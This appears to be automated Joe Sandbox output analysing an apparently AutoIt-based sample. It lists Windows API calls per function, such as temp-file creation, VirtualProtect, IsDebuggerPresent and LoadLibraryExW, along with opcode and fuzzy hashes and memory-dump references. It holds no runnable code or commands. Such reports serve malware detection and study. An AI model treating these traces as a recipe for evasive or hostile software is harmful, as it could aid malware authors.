• Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
• Instruction ID: 1c7a5e370fcee567f9c61200d5952a5c587aea6fa2d6286f5cd906058487e944
• Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
• Instruction Fuzzy Hash: 63F0ECB154024DABDB64EFE0CC49FEE777CBF44705F448908BA0A9A184DB7596188B62
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 003198F8
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0031990F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
• Opcode ID: 3ffc50a1c51049642a710220ab9e4248250d63e7e29368fe2e3e435e0215caa2
• Instruction ID: a97877f6e38efe8277735bcf569051a12f58f424dca6e16deb30132b56b8f1df
• Opcode Fuzzy Hash: 3ffc50a1c51049642a710220ab9e4248250d63e7e29368fe2e3e435e0215caa2
• Instruction Fuzzy Hash: 2ED05E7994030DAFDB619BA0DC4EFEBB73CE704700F4046B1BA54D20A1EAB095988B91
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 41d6d90cd4cb5adf509d653c003157bfbe3627cd806ea9c1483d9c23458ae538
• Instruction ID: 84b90acb734ee2f3946e00f08e564cd3472c187d993f697f97cd67da6e666284
• Opcode Fuzzy Hash: 41d6d90cd4cb5adf509d653c003157bfbe3627cd806ea9c1483d9c23458ae538
• Instruction Fuzzy Hash: 4AF14470A083119FCB15DF28D480A6EBBE5FF89314F55892EF8999B252D730E945CF82
APIs
• _memset.LIBCMT ref: 002B4370
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 002B4415
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 002B4432
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: IconNotifyShell_$_memset
• String ID:
• API String ID: 1505330794-0
• Opcode ID: ca7ea1a0041ef746c6f84c5cf4dad4bb0cf36976a40257e07bf5b3aa336300c1
• Instruction ID: 48928f659af0f11d8a09fad13773d2dc4e36dfffa32595fd657da6fcad37f511
• Opcode Fuzzy Hash: ca7ea1a0041ef746c6f84c5cf4dad4bb0cf36976a40257e07bf5b3aa336300c1
• Instruction Fuzzy Hash: 88316FB05147018FD725EF24D8846DBBBF8FB58348F100D2EE59A86252E7B1A994CB52
APIs
• __FF_MSGBANNER.LIBCMT ref: 002D5733
  • Part of subcall function 002DA16B: __NMSG_WRITE.LIBCMT ref: 002DA192
  • Part of subcall function 002DA16B: __NMSG_WRITE.LIBCMT ref: 002DA19C
• __NMSG_WRITE.LIBCMT ref: 002D573A
  • Part of subcall function 002DA1C8: GetModuleFileNameW.KERNEL32(00000000,003733BA,00000104,?,00000001,00000000), ref: 002DA25A
  • Part of subcall function 002DA1C8: ___crtMessageBoxW.LIBCMT ref: 002DA308
  • Part of subcall function 002D309F: ___crtCorExitProcess.LIBCMT ref: 002D30A5
  • Part of subcall function 002D309F: ExitProcess.KERNEL32 ref: 002D30AE
  • Part of subcall function 002D8B28: __getptd_noexit.LIBCMT ref: 002D8B28
• RtlAllocateHeap.NTDLL(00F60000,00000000,00000001,00000000,?,?,?,002D0DD3,?), ref: 002D575F
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
• String ID:
• API String ID: 1372826849-0
• Opcode ID: 740d9bee2b3bbaf52ad7936d423a9620bc0d94b848649a7d13cd5238299098bf
• Instruction ID: abb969e0ccca721303dc3b04e03391036e1bdea7c60b64a049f00d5fe02c2f72
• Opcode Fuzzy Hash: 740d9bee2b3bbaf52ad7936d423a9620bc0d94b848649a7d13cd5238299098bf
• Instruction Fuzzy Hash: E601F931630B22DAF6116B35EC42B6DB74C8B42361F200427F409D6381DEF0CC609A61
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00319548,?,?,?,?,?,00000004), ref: 003198BB
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00319548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003198D1
• CloseHandle.KERNEL32(00000000,?,00319548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003198D8
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: 51fd767febe7e22b5d188d4aebff12b1cbd004f167042e980b60a7e2a313fb34
• Instruction ID: cf04f3b4e64b49de62ce39f659b88ebe75c43e35597500c92ca85c449cee6f39
• Opcode Fuzzy Hash: 51fd767febe7e22b5d188d4aebff12b1cbd004f167042e980b60a7e2a313fb34
• Instruction Fuzzy Hash: 43E08632940214BBD7231B54EC49FDA7B5DAB06770F104220FB14690E087B125119798
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00318D1B
                                                                                                                      • Part of subcall function 002D2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,002D9A24), ref: 002D2D69
                                                                                                                      • Part of subcall function 002D2D55: GetLastError.KERNEL32(00000000,?,002D9A24), ref: 002D2D7B
                                                                                                                    • _free.LIBCMT ref: 00318D2C
                                                                                                                    • _free.LIBCMT ref: 00318D3E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                    • Instruction ID: 0a1358aabe0cc68c0862a1c260fd5d50e61b0c8675794d717dff68ee5027af21
                                                                                                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                    • Instruction Fuzzy Hash: 1FE012A161170186CB29A678B940AD353DD4F6D352715091EB40DD7286CE64FC968528
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: CALL
                                                                                                                    • API String ID: 0-4196123274
                                                                                                                    • Opcode ID: 813ebdda487ddafc0e469f2cd6f3e69d92513fe2db319b807ef21ec6787672b1
                                                                                                                    • Instruction ID: 57e61222cfcb2ae4f31df6efa16ef4aed8ea00b68c7b2f9f4869fec9373d2f6c
                                                                                                                    • Opcode Fuzzy Hash: 813ebdda487ddafc0e469f2cd6f3e69d92513fe2db319b807ef21ec6787672b1
                                                                                                                    • Instruction Fuzzy Hash: 8D226A70528341DFC725DF14C490BAABBE1BF48384F14896DE99A8B362D771EC64CB82
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4104443479-0
                                                                                                                    • Opcode ID: dcaa55ca9a04723143b9e8694f613c9e7f590ea8bac40c6ab2e3bad66fc376f5
                                                                                                                    • Instruction ID: 0d63f9f61eb20721fc35e7f066889ddf9372406f2ffb0c26b67c2b7a2cc4327f
                                                                                                                    • Opcode Fuzzy Hash: dcaa55ca9a04723143b9e8694f613c9e7f590ea8bac40c6ab2e3bad66fc376f5
                                                                                                                    • Instruction Fuzzy Hash: B43189B1624506AFC744DF68C8D1E69F3A5FF88350B15862AE519CB391DB70ED70CB90
                                                                                                                    APIs
                                                                                                                    • IsThemeActive.UXTHEME ref: 002B4834
                                                                                                                      • Part of subcall function 002D336C: __lock.LIBCMT ref: 002D3372
                                                                                                                      • Part of subcall function 002D336C: DecodePointer.KERNEL32(00000001,?,002B4849,00307C74), ref: 002D337E
                                                                                                                      • Part of subcall function 002D336C: EncodePointer.KERNEL32(?,?,002B4849,00307C74), ref: 002D3389
                                                                                                                      • Part of subcall function 002B48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002B4915
                                                                                                                      • Part of subcall function 002B48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002B492A
                                                                                                                      • Part of subcall function 002B3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002B3B68
                                                                                                                      • Part of subcall function 002B3B3A: IsDebuggerPresent.KERNEL32 ref: 002B3B7A
                                                                                                                      • Part of subcall function 002B3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,003752F8,003752E0,?,?), ref: 002B3BEB
                                                                                                                      • Part of subcall function 002B3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 002B3C6F
                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002B4874
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1438897964-0
                                                                                                                    • Opcode ID: b7f797d948ba83e4d710cab104fe38ef773d417e1f63f96f278b77887d506ba5
                                                                                                                    • Instruction ID: a82eddb9bab5209cb5946f812319c356b8834eec3977374c0adc8413ba6ffd29
                                                                                                                    • Opcode Fuzzy Hash: b7f797d948ba83e4d710cab104fe38ef773d417e1f63f96f278b77887d506ba5
                                                                                                                    • Instruction Fuzzy Hash: A7119D719187419FC711EF29EC4594ABBF8EF85790F10491EF149832B2DBB09994CF92
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002D571C: __FF_MSGBANNER.LIBCMT ref: 002D5733
                                                                                                                      • Part of subcall function 002D571C: __NMSG_WRITE.LIBCMT ref: 002D573A
                                                                                                                      • Part of subcall function 002D571C: RtlAllocateHeap.NTDLL(00F60000,00000000,00000001,00000000,?,?,?,002D0DD3,?), ref: 002D575F
                                                                                                                    • std::exception::exception.LIBCMT ref: 002D0DEC
                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 002D0E01
                                                                                                                      • Part of subcall function 002D859B: RaiseException.KERNEL32(?,?,?,00369E78,00000000,?,?,?,?,002D0E06,?,00369E78,?,00000001), ref: 002D85F0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3902256705-0
                                                                                                                    • Opcode ID: 6628a7d5311cfd68d2bfa502c82d47fecb8c9550f1a3faa1107d894f6d96ffb7
                                                                                                                    • Instruction ID: 1367fd08e042fb90dda28a226967aecccbbd14cec15b4f183a5f4b274fea00a3
                                                                                                                    • Opcode Fuzzy Hash: 6628a7d5311cfd68d2bfa502c82d47fecb8c9550f1a3faa1107d894f6d96ffb7
                                                                                                                    • Instruction Fuzzy Hash: F2F0F43582031A66CB11BAA4EC41ADFB7ACDF05310F10442BF814AA391DFB0AE60CAE1
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __lock_file_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 26237723-0
                                                                                                                    • Opcode ID: cc5ac7ccb7435f3bc6a89a7dc9f83f5c844a0de579dba9316501353510c7ff88
                                                                                                                    • Instruction ID: bd7641ce1f516009e86c0da2143ae526e394121ad67195d84ad63f090c2d5e70
                                                                                                                    • Opcode Fuzzy Hash: cc5ac7ccb7435f3bc6a89a7dc9f83f5c844a0de579dba9316501353510c7ff88
                                                                                                                    • Instruction Fuzzy Hash: 8B01D471820A19EBCF12AF688C0689E7B65EF50321F548117F8246A391DBB1CE31DF92
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002D8B28: __getptd_noexit.LIBCMT ref: 002D8B28
                                                                                                                    • __lock_file.LIBCMT ref: 002D53EB
                                                                                                                      • Part of subcall function 002D6C11: __lock.LIBCMT ref: 002D6C34
                                                                                                                    • __fclose_nolock.LIBCMT ref: 002D53F6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2800547568-0
                                                                                                                    • Opcode ID: d07ab2b53d99b50d034b0401e0f6aa9947ea643b1bf855783eba146fb8391106
                                                                                                                    • Instruction ID: cd6e415d62e2243797508676ed331c5c37c597dd0e8b4192d12beb245fd3b833
                                                                                                                    • Opcode Fuzzy Hash: d07ab2b53d99b50d034b0401e0f6aa9947ea643b1bf855783eba146fb8391106
                                                                                                                    • Instruction Fuzzy Hash: 27F09071830A159ADB51AF7598067AD7BA06F41374F20824BE464AB3C1CBFC8D619F52
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 01169218: GetFileAttributesW.KERNELBASE(?), ref: 01169223
                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01169AF2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2094043687.0000000001168000.00000040.00000020.00020000.00000000.sdmp, Offset: 01168000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1168000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesCreateDirectoryFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3401506121-0
                                                                                                                    • Opcode ID: 4c84fc944b541c2fc07e30a3b9a314b25094fc0e0b01bdc475f563df67d61e3a
                                                                                                                    • Instruction ID: 0f1f6d1c7e3e1f89c54e7ecd4d561518f415f219e5bec347a8fa19ef6ddd17ae
                                                                                                                    • Opcode Fuzzy Hash: 4c84fc944b541c2fc07e30a3b9a314b25094fc0e0b01bdc475f563df67d61e3a
                                                                                                                    • Instruction Fuzzy Hash: 83518231A1520D97EF14EFA4C854BEE737DEF58300F1085A8A609F7280EB7A9B54C7A5
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction ID: 63bf481e601a4f6f57cd9e677aa91dfe15d9a9bdf10ad46fb3df1541ccc7c170
                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction Fuzzy Hash: 6231A070A201069BC718DF59C4C4A69F7A6FB59300F6486A7E80ACB365DA71EDE1DB80
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: 8bf13d952b1eb2c84af6ca36a191bd53e33dd9edcc8dc5e670c9d07faf9394e1
                                                                                                                    • Instruction ID: d5b121097f5fd5f6ff6dabcfdc9063bd33764af285e20eed6456b75491ca0fbd
                                                                                                                    • Opcode Fuzzy Hash: 8bf13d952b1eb2c84af6ca36a191bd53e33dd9edcc8dc5e670c9d07faf9394e1
                                                                                                                    • Instruction Fuzzy Hash: DD4136745143418FDB25CF24C484B6ABBE0BF49354F0988ACE9998B362C371EC55CF42
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 42ba6fa5a3fce640b42b9ba6973db0b820df440f550e9baae2d113647cd6e3c4
                                                                                                                    • Instruction ID: 97dee790345a4c5252c2e70bbcd1e41f4ffa5b89dcfca1247fed7eb624accb7b
                                                                                                                    • Opcode Fuzzy Hash: 42ba6fa5a3fce640b42b9ba6973db0b820df440f550e9baae2d113647cd6e3c4
                                                                                                                    • Instruction Fuzzy Hash: A52126664093815FD7234F38A885BD6BFA4AF82220F0540DFE884CF977C2209C59C7A2
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 002B4BEF
                                                                                                                      • Part of subcall function 002D525B: __wfsopen.LIBCMT ref: 002D5266
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 002B4E0F
                                                                                                                      • Part of subcall function 002B4B6A: FreeLibrary.KERNEL32(00000000), ref: 002B4BA4
                                                                                                                      • Part of subcall function 002B4C70: _memmove.LIBCMT ref: 002B4CBA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1396898556-0
                                                                                                                    • Opcode ID: bfbc526b6266911b6b9df4c083934302b24aec5f3083be980b1666f05959ca89
                                                                                                                    • Instruction ID: 62dfe5b2481a0b5d65cce389a26b13f6633c48bb58f3a8cf7de9004059482acf
                                                                                                                    • Opcode Fuzzy Hash: bfbc526b6266911b6b9df4c083934302b24aec5f3083be980b1666f05959ca89
                                                                                                                    • Instruction Fuzzy Hash: DD112731A20205ABCF11FF71CC92FED77A9AF44780F508829F541A7183DAB0DA219F51
